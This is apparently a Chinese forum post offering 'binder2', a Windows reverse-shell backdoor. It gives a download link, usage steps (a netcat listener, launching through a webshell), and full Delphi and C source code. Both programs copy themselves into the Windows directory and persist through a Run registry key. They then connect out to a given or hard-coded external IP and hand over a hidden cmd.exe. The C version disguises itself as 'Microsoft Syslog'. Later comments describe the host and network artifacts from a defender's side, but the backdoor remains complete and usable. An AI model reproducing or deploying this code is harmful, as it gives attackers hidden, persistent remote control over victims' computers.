Delphi 版 binder2 反弹式后门程序及工具
下载地址:http://downloads.2ccc.com/general/internet_lan/bander2.rar
Winsock2为kol socket单元文件,修改自c版代码binder2.c
使用说明:
binder2.exe 反弹式后门程序
简介:
在WEB的渗透测试中,我们经常会遇到主机端口被过滤的情况,虽然成功创建后门,但是连接不上,这时,这个反弹式后门也许能起上点作用.
用法:
1. 在本地机器监听一个端口:
netcat -vv -l -p 80
2. 通过webShell或是别的什么运行后门:
kol_binder2 80 youIPadd
3. 本地监听端口将截获一个来自远程主机的cmd.
注意:
程序本身会创建一个自启动方法, 如果没有参数的命令,会连接默认IP和默认端口,这个exe默认的IP地址是内网地址127.0.0.1,端口1234.
程序会复制自身到c:/winnt/下名为binder2.exe,并在
HKEY_CURRENT_USER//Software//Microsoft//Windows//CurrentVersion//Run 下创建启动键. 如果需要卸载,请使用 kol_binder2 /kill 命令.(如果因权限问题,这些将不能执行,比如在webShell中执行时.)
Code by hnxyy
Date:2005/6/16
QQ:19026695
program kol_binder2;
uses
Windows,Winsock2,winsock;
// Parses S as an integer with Val; yields Default when S is not a valid
// integer literal (Val reports a non-zero error position).
function StrToIntDef(const S: string; Default: Integer): Integer;
var
  Parsed, ErrPos: Integer;
begin
  Val(S, Parsed, ErrPos);
  if ErrPos = 0 then
    Result := Parsed
  else
    Result := Default;
end;
// Program body (Delphi port of binder2.c). Read from the defender's side it
// does four things in order: drops a copy of this executable into the
// Windows directory, registers that copy under the HKCU ...\Run key, loops
// until a TCP connect to ip:port succeeds, then starts a hidden cmd.exe whose
// standard handles are that socket. Host artifacts: the dropped binder2.exe
// and the Run value 'binder2'. Network artifact: one outbound connect attempt
// to ip:port every 30 s until one succeeds, then a long-lived session owned
// by a cmd.exe child of this process. No Win32/Winsock return value below is
// checked.
// NOTE(review): the '/' path separators in this copy are presumably
// backslashes mangled by extraction (the C listing shows '/x00' where '\x00'
// is meant) — confirm against the original source.
var
mykey :HKEY;                            // Run key handle from RegOpenKeyEx
buffer,cmd :array[0..MAX_PATH] of char; // buffer: drop path; cmd: own module path
si :TStartupInfo;                       // startup info for the cmd.exe child
wd :TWSAdata;                           // WSAStartup output, not used afterwards
sock :TSocket;                          // socket handed to cmd.exe as its std handles
pi :TProcessInformation;                // cmd.exe process/thread handles
sin :TSockAddrIn;                       // target address built from ip/port
ip :pchar;                              // target address text (default '127.0.0.1')
port :integer;                          // target port (default 1234)
begin
// 1. Drop: <WindowsDirectory>/binder2.exe, overwriting any existing file
//    (bFailIfExists = false).
GetWindowsDirectory(buffer,MAX_PATH);
lstrcat(buffer,'/binder2.exe');
GetModuleFileName(hInstance,cmd,MAX_PATH);
CopyFile(cmd,buffer,false);
// 2. Persist: Run value 'binder2' -> drop path. The data length written is
//    sizeof(buffer), i.e. the whole MAX_PATH+1 buffer rather than the string
//    length, so the stored value carries trailing bytes past the terminator
//    (worth knowing when reading the key forensically).
RegOpenKeyEx(HKEY_CURRENT_USER,'Software/Microsoft/Windows/CurrentVersion/Run',0,KEY_ALL_ACCESS,mykey);
RegSetValueEx(mykey,'binder2',0,REG_SZ,@buffer,sizeof(buffer));
// 3. '/kill' as the only argument: remove the Run value and the dropped file,
//    then exit. Both were just (re)written above, so the statement order means
//    an uninstall always follows a fresh install within the same run.
if (ParamCount=1) and (lstrcmpi(lpstr(ParamStr(1)),'/kill')=0) then
begin
RegDeleteValue(MyKey,'binder2');
DeleteFile(buffer);
ExitProcess(0);
end;
// 4. Target selection. Zero or more than two arguments -> built-in default
//    127.0.0.1:1234. Otherwise port := ParamStr(1) (0 if not numeric) and
//    ip := ParamStr(2); with exactly one argument ParamStr(2) is the empty
//    string, unlike the C version, which keeps its default IP in that case.
if (ParamCount<1) or (ParamCount>2) then
begin
port :=1234;
ip :='127.0.0.1';
end else
begin
port :=StrToIntDef(ParamStr(1),0);
ip :=lpstr(ParamStr(2));
end;
// Superseded lines kept from an earlier revision; the live calls follow.
//FillChar(si,sizeof(si),#0);
//WSAStartup($101,wd);
//sock :=socket(PF_INET,SOCK_STREAM,IPPROTO_TCP);
// 5. Winsock 1.1 and a socket created through WSASocket with dwFlags = 0
//    instead of socket(); the C original attributes this to a David Litchfield
//    talk — presumably so the non-overlapped handle can serve as a redirected
//    std handle; confirm.
ZeroMemory(@si, SizeOf(si));
WSAStartup(MAKEWORD(1,1),wd);
sock :=WSASocket(PF_INET, SOCK_STREAM, IPPROTO_TCP, nil, 0, 0);
sin.sin_family :=AF_INET;
sin.sin_port :=htons(port);
sin.sin_addr.s_addr :=inet_addr(ip);
// 6. Beacon: connect is retried every 30 s with no attempt cap, so a filtered
//    or closed port shows up as an indefinite 30 s connect cadence from this
//    process to ip:port.
while (connect(sock,sin,sizeof(sin))<>0) do Sleep(30000);
// 7. Shell: hidden cmd.exe (SW_HIDE), handles inherited (bInheritHandles =
//    TRUE), stdin/stdout/stderr all set to the connected socket. Process-tree
//    view: this process -> cmd.exe, with the parent owning the network socket.
si.cb :=sizeof(si);
si.dwFlags :=STARTF_USESHOWWINDOW or STARTF_USESTDHANDLES;
si.wShowWindow :=SW_HIDE;
si.hStdInput :=sock;
si.hStdOutput :=sock;
si.hStdError :=sock;
CreateProcess(nil,'cmd.exe',nil,nil,TRUE,CREATE_NEW_CONSOLE,nil,nil,si,pi);
// 8. Block until cmd.exe exits, then release its handles, the socket and
//    Winsock. This process therefore stays alive for the whole remote session.
WaitForSingleObject(pi.hProcess, INFINITE);
CloseHandle(pi.hProcess);
CloseHandle(pi.hThread);
CloseSocket(sock);
WSACleanup;
end.
附 binder2.exe c 版代码
/*
* Trivial Reverse cmd binder
*
* When LAN is full, ThreaT will walk on your network
*
******************************
compile : cl.exe binder2.c
Usage
_____
binder2.exe (backdoor the current workstation & connect to default IP for bind a cmd shell on default Port)
binder2.exe 123 (connect to default IP & bind a cmd shell on port 123)
binder2.exe 123 10.0.0.1 (connect to 10.0.0.1 & bind a cmd shell on port 123)
binder2 /kill (remove startkey of the registery)
******************************
*
* ThreaT@Ifrance.com
* http://s0h.cc/~threat/
*
*/
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
#pragma comment(lib, "advapi32.lib")
#pragma comment(lib, "user32.lib")
/* Win entry point (avoids a big ugly console window popping up) */
int WINAPI WinMain(
HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpszCmdLine,
int nCmdShow
)
{
/* Defender's reading of this function, in order: (1) drop self as
 * <WindowsDirectory>\syslog.exe, (2) persist via the HKCU ...\Run value
 * "Microsoft Syslog", (3) parse "/kill" | port [IP] from the command line,
 * (4) retry a TCP connect to IP:port every 30 s, (5) spawn a hidden cmd.exe
 * with the socket as its std handles and return at once. Host artifacts:
 * the dropped syslog.exe and the Run value; network artifact: the 30 s
 * connect cadence to the hard-coded default address unless one is given.
 * No return value below is checked. The "//" and "/x00" inside string
 * literals are presumably "\\" and "\x00" mangled by extraction. */
WSADATA wd;
HKEY MyKey;
SOCKET sock;
STARTUPINFO si;
PROCESS_INFORMATION pi;
struct sockaddr_in sin;
char buffer[MAX_PATH], cmd[MAX_PATH], *p,
IP[16] = "81.91.66.30/x00"; // default IP address (here www.s0h.cc) -- an external host, not loopback
unsigned short port = 1234; // default port
/* backdoor the box: drop + Run value, done before any argument is looked at */
GetWindowsDirectory (buffer,MAX_PATH);
lstrcat (buffer,"//syslog.exe/x00");
GetModuleFileName (NULL,cmd,MAX_PATH);
CopyFile (cmd,buffer,FALSE);
RegOpenKeyEx(HKEY_CURRENT_USER,"Software//Microsoft//Windows//CurrentVersion//Run",(DWORD)NULL,KEY_ALL_ACCESS,&MyKey);
RegSetValueEx (MyKey,"Microsoft Syslog",(DWORD)NULL,REG_SZ,( CONST BYTE * )&buffer,strlen (buffer));
/* handle any arguments: strtok cuts lpszCmdLine at the first space, so the
 * comparisons below see only the first token ("/kill" or the port); the
 * optional second token is the IP, copied with a 16-byte bound. "/kill"
 * removes only the Run value -- the dropped file stays in place (the Delphi
 * port on this page also deletes it). */
p = strtok (lpszCmdLine," ");
if (lpszCmdLine[0] == '/' || IsCharAlphaNumeric(lpszCmdLine[0]))
{
if (!lstrcmpi (lpszCmdLine,"/kill")) { RegDeleteValue(MyKey,"Microsoft Syslog"); ExitProcess (0);}
else port = atoi (lpszCmdLine);
if ( p = strtok (NULL," ") ) lstrcpyn (IP,p,16);
}
/* set things up: Winsock 1.1 and a socket from WSASocket with dwFlags = 0
 * (non-overlapped) -- presumably so it works as a redirected std handle */
memset(&si, 0, sizeof(si));
WSAStartup(MAKEWORD( 1, 1 ), &wd);
// David Litchfield in his Blackhat talk said... (PJ)
sock=WSASocket(PF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
sin.sin_family = AF_INET;
sin.sin_port = htons(port);
sin.sin_addr.s_addr = inet_addr(IP);
/* retry the connection every 30 seconds, with no attempt cap: an unreachable
 * target shows up as an indefinite 30 s connect cadence from this process */
while ( connect(sock, (struct sockaddr*)&sin, sizeof (sin)) ) Sleep (30000);
/* spawn the shell and leave: hidden cmd.exe inherits the socket as
 * stdin/stdout/stderr (bInheritHandles = TRUE). Unlike the Delphi port this
 * returns immediately without waiting on cmd.exe or closing the pi handles
 * and the socket, so the child keeps the session open through its own
 * inherited handle after the parent has exited. */
si.cb = sizeof(si);
si.dwFlags = STARTF_USESHOWWINDOW+STARTF_USESTDHANDLES;
si.wShowWindow=SW_HIDE;
si.hStdInput = si.hStdOutput = si.hStdError = (void *)sock;
CreateProcess(NULL,"cmd.exe",NULL,NULL, TRUE, 0,0, NULL, &si, &pi );
return 0;
}